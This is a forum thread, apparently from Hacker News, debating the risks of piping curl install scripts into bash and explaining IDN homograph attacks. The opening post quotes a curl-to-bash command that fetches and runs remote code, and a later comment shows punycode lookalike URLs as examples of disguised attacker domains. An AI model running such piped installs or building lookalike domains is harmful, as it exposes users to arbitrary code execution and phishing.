The browser catches homograph attacks, the terminal doesn't

>>MrBudd+(OP)
> curl -sSL https://install.example-cli.dev | bash # safe

This is not and has never been safe.

>>accoun+2Z3
It's about as safe as trusting all the add-ons in your IDE, and all the packages your node app pulls from random package repos.

It's just the plausible blame that shifts.

If you read the script before you pipe it into your shell, it's safe.

And if that's not safe, then it's just as dangerous to trust that an unopened bottle of ketchup is safe.

Nothing is safe. Everything is a judgement. Being culpable is a professional service. Lucky people out-earn unlucky people. The world is a scary place.

>>digita+VZ3
If you read the script before piping it into your shell, you're doing better than (I'm guessing) 90% of people, but it's still possible that the attacker who got you to copy https://xn--nstall-ovf.xn--example-cl-62i.dev into your terminal has also made similarly-hard-to-spot changes to the install script. E.g. if it downloads a .deb package from https://xn--nstall-ovf.xn--example-cl-62i.dev (same Cyrillic і character in there that looks like a Latin i but isn't), you might not spot that by reading the script.

But IMHO, your "unopened bottle of ketchup" analogy doesn't work. These days, the likelihood of someone trying to trick you into running arbitrary code disguised as an install script is so much higher than the chance that someone working at the ketchup bottling plant is deliberately contaminating bottles before they go out.

>>rmunn+Kha
Hah. Hacker News is immune to homograph attacks. Good to know.

>>rmunn+Qha
> 2017-04-14: Blake Rand

> Links in comments were vulnerable to an IDN homograph attack.

https://news.ycombinator.com/security.html

zlacker